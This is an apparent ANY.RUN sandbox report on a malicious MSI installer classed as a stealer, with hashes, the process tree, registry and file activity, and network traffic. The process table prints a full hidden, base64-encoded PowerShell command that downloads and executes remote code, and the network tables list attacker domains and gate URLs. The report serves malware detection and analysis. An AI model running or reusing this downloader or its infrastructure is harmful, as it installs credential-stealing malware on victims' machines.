| File name: | Setup.msi |
| Full analysis: | https://app.any.run/tasks/6264407a-8604-454d-a915-03ad6661d97c |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | December 10, 2024, 00:23:57 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-msi |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {26CF2CD9-65C4-4FD1-884E-3A1EA87A4F0F}, Number of Words: 10, Subject: Niwp App, Author: Tioao Wesah, Name of Creating Application: Niwp App, Template: ;1033, Comments: This installer database contains the logic and data required to install Niwp App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 9 11:54:59 2024, Last Saved Time/Date: Mon Dec 9 11:54:59 2024, Last Printed: Mon Dec 9 11:54:59 2024, Number of Pages: 450 |
| MD5: | 46E9B975F05FED7F4E24F1803297AA37 |
| SHA1: | D57442E6B8D511F732EAF95C85ED54024B2D443D |
| SHA256: | 3A0EF73F050CE7ADFCE9DBDE4C62342CCF2745ABE5CAE4F8AB09F2937BEAC682 |
| SSDEEP: | 393216:3ykMnW9WBoRHQONhz2xLfn6hD77wvyzBQOrtN+TDCQrj:itoWBoRwT/6h+SBH7+TuK |
| .msi | | | Microsoft Windows Installer (81.9) |
|---|---|---|
| .mst | | | Windows SDK Setup Transform Script (9.2) |
| .msp | | | Windows Installer Patch (7.6) |
| .msi | | | Microsoft Installer (100) |
| Security: | None |
|---|---|
| CodePage: | Windows Latin 1 (Western European) |
| RevisionNumber: | {26CF2CD9-65C4-4FD1-884E-3A1EA87A4F0F} |
| Words: | 10 |
| Subject: | Niwp App |
| Author: | Tioao Wesah |
| LastModifiedBy: | - |
| Software: | Niwp App |
| Template: | ;1033 |
| Comments: | This installer database contains the logic and data required to install Niwp App. |
| Title: | Installation Database |
| Keywords: | Installer, MSI, Database |
| CreateDate: | 2024:12:09 11:54:59 |
| ModifyDate: | 2024:12:09 11:54:59 |
| LastPrinted: | 2024:12:09 11:54:59 |
| Pages: | 450 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2744 | C:\WINDOWS\system32\WerFault.exe -u -p 4052 -s 152 | C:\Windows\System32\WerFault.exe | — | CEPHtmlEngine.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4052 | "C:\Users\admin\AppData\Roaming\Tioao Wesah\Niwp App\CEPHtmlEngine.exe" | C:\Users\admin\AppData\Roaming\Tioao Wesah\Niwp App\CEPHtmlEngine.exe | msiexec.exe | ||||||||||||
User: admin Company: Adobe Inc Integrity Level: MEDIUM Description: Adobe CEP HTML Engine Exit code: 3221226505 Version: 11.2.0 Modules
| |||||||||||||||
| 4536 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5268 | powershell -windowstyle hidden -e JABMAGYAZQBQAG4AIAA9ACAAKAAiAGcAbwBXAGsALwBiADIAaAB1AGYALwA5AHYASQBAAGkAaQA2AEMARgByAHIAdQA0AHAAbwBDAEEALwA2AHUAZwB1AFoAaQBRAHYAZgAyAC8ALwByAE8AZQBnAFkARwBqAHUANwB1AGYAcgA2ADIASQA5AFAAUQA9ACIAKQAKACQAdABaAGEAMgBHACAAPQAgACQATABmAGUAUABuAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIAAiAGEAIgApAAoAJABLAGkAdwBZAHQAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAWgBhADIARwApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8AIAAtAGIAeABvAHIAIAAyADAAMQB9AAoAJABGAEwAWABvAGYAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEsAaQB3AFkAdAApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIAAiAGEAIgApAAoAJABmAGsAWQBwAFoAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYATABYAG8AZgApAAoAJAB0AGkAaAA4AHgAIAA9ACAAWwBiAHkAdABlAFsAXQBdACgANgA0ACwAIAAyADAANQAsACAAMgAwADQALAAgADEAOQA4ACwAIAAxADAANQApADsACgAkAEoAdAB0AEQASwAgAD0AIAAwADsACgAkAG4AVABHAFEAYgAgAD0AIAAkAGYAawBZAHAAWgAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAJABfACAALQBiAHgAbwByACAAJAB0AGkAaAA4AHgAWwAkAEoAdAB0AEQASwArACsAXQA7AAoAaQBmACAAKAAkAEoAdAB0AEQASwAgAC0AZwBlACAAJAB0AGkAaAA4AHgALgBMAGUAbgBnAHQAaAApACAAewAKACQASgB0AHQARABLACAAPQAgADAACgB9AAoAfQAKAAoAJABlAFYAZwBGAHAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHoAMABDAFYAQQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbgBUAEcAUQBiACkAOwAKACQAYQAyAGoAcABUAD0AJABlAFYAZwBGAHAALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAHoAMABDAFYAQQApADsACgAkAGgASAB6ADAAdQAgAD0AIAAkAGEAMgBqAHAAVAAuAFIAZQBwAGwAYQBjAGUAKAAiACEAIgAsACAAIgBsACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgBkACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAGAAIgAiACwAIAAiAFQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJwAiACwAIAAiAEgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAOwAiACwAIAAiAEYAIgApAAoAJABRADEAYgBGADUAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgASAB6ADAAdQApAAoAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAFEAMQBiAEYANQApACAAfAAgAGkAZQB4AAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5556 | C:\WINDOWS\system32\WerFault.exe -u -p 4052 -s 468 | C:\Windows\System32\WerFault.exe | — | CEPHtmlEngine.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6208 | C:\WINDOWS\SysWOW64\explorer.exe explorer.exe | C:\Windows\SysWOW64\explorer.exe | CEPHtmlEngine.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 0 Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6432 | "C:\Windows\System32\msiexec.exe" /i C:\Users\admin\Desktop\Setup.msi | C:\Windows\System32\msiexec.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6608 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6696 | C:\Windows\syswow64\MsiExec.exe -Embedding FC134B4F1486AE6F53DCA246EA3801F6 | C:\Windows\SysWOW64\msiexec.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6916 | -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Temp\pssB963.ps1" -propFile "C:\Users\admin\AppData\Local\Temp\msiB960.txt" -scriptFile "C:\Users\admin\AppData\Local\Temp\scrB961.ps1" -scriptArgsFile "C:\Users\admin\AppData\Local\Temp\scrB962.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | Owner |
Value: D0190000B4E372DA994ADB01 | |||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | SessionHash |
Value: A85E2CD0138E075F11D0B89861E5D828A884FC68FC6498743713F1B6EB669F2E | |||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | Sequence |
Value: 1 | |||
| (PID) Process: | (6696) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6696) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6696) msiexec.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders |
| Operation: | write | Name: | C:\Users\admin\AppData\Roaming\Microsoft\Installer\ |
Value: | |||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\1850CF546DFD0D3438A389643E51EC37 |
| Operation: | write | Name: | 9C4CDC140A296F24AA96870CFF91CCAE |
Value: C:\Users\admin\AppData\Roaming\Tioao Wesah\Niwp App\api-ms-win-core-rtlsupport-l1-1-0.dll | |||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\3234EAF45B31CE748B097BACAD0DEB3C |
| Operation: | write | Name: | 9C4CDC140A296F24AA96870CFF91CCAE |
Value: C:\Users\admin\AppData\Roaming\Tioao Wesah\Niwp App\api-ms-win-core-string-l1-1-0.dll | |||
| (PID) Process: | (6608) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\C4890170E11986445A512DF2E8C5ACF3 |
| Operation: | write | Name: | 9C4CDC140A296F24AA96870CFF91CCAE |
Value: C:\Users\admin\AppData\Roaming\Tioao Wesah\Niwp App\api-ms-win-core-synch-l1-1-0.dll | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6608 | msiexec.exe | C:\Windows\Installer\137c09.msi | — | |
MD5:— | SHA256:— | |||
| 6696 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\msiB960.txt | — | |
MD5:— | SHA256:— | |||
| 6696 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\scrB961.ps1 | — | |
MD5:— | SHA256:— | |||
| 6696 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\scrB962.txt | — | |
MD5:— | SHA256:— | |||
| 6696 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\pssB963.ps1 | — | |
MD5:— | SHA256:— | |||
| 6608 | msiexec.exe | C:\Windows\Temp\~DFD8E8A2C694DB7E99.TMP | binary | |
MD5:BF619EAC0CDF3F68D496EA9344137E8B | SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 | |||
| 6608 | msiexec.exe | C:\Users\admin\AppData\Roaming\Tioao Wesah\Niwp App\gigjcxobvj.rar | — | |
MD5:— | SHA256:— | |||
| 6608 | msiexec.exe | C:\Windows\Installer\MSIB86D.tmp | binary | |
MD5:A7B9260546B3B7380936DF3C20528E75 | SHA256:901586022438518EC8C0D68F72457DB6BD3C421B09C59F3C10B7FF3A4B80BB4E | |||
| 6608 | msiexec.exe | C:\Windows\Installer\MSI7CF3.tmp | executable | |
MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2 | SHA256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752 | |||
| 6916 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:47AE79E9347D23A603674C1D45B1FA2B | SHA256:52B3BDA07276D804E41EFBF0F3BF90FC3CFE32FC9055C04B98F2D585F0A2C7A2 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
448 | svchost.exe | GET | 200 | 184.24.77.37:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.24.77.37:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
448 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6208 | explorer.exe | GET | 200 | 172.67.148.192:80 | http://hit-hg.com/test_gate0117.php?a=IVseoWyYSoaxXd6&id=0 | unknown | — | — | unknown |
6208 | explorer.exe | GET | 200 | 172.67.148.192:80 | http://hit-hg.com/gate2.php?a=xF9FC7UHFPghH50v9OYEx509Qn3PKPOmxoYTbAuMq7R0JCH6%2FZcar2RpHQASgdGu42OpAhKXQIvMociS4WrT5cbJR6IIfS23ebC1ZkexcbI7Q6iBIuLruxQ13HKkuQ%3D%3D | unknown | — | — | unknown |
6208 | explorer.exe | GET | 301 | 172.67.183.170:80 | http://rr-back.com/click?cnv_id=false&value=1 | unknown | — | — | unknown |
— | — | GET | 200 | 104.21.48.1:443 | https://bob-black.com/2511.bs64 | unknown | text | 1.88 Mb | — |
— | — | POST | 200 | 188.114.97.9:443 | https://platiindustries.com/licenseUser.php | unknown | text | 11 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 104.126.37.145:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 184.24.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
448 | svchost.exe | 184.24.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
448 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
platiindustries.com |
| unknown |
hit-hg.com |
| unknown |
rr-back.com |
| unknown |
bob-black.com |
| unknown |
bin-bobin.com |
| unknown |
Process | Message |
|---|---|
CEPHtmlEngine.exe | CRC16-1: 21401, CRC32-1: 245487706, CRC16-2: 56578, CRC32-2: 3913949576, Final Sum: 4159515261
|
CEPHtmlEngine.exe | vrvzgajddgymk |
CEPHtmlEngine.exe | vrvzgajddgymk |
CEPHtmlEngine.exe | CRC64 (Generated): 18446744073709551615
|
CEPHtmlEngine.exe | Drive C:\: Total Size = 260281 MB, Used = 42237 MB, Free = 218044 MB
|
CEPHtmlEngine.exe | Semaphore 'test_sem' created successfully. |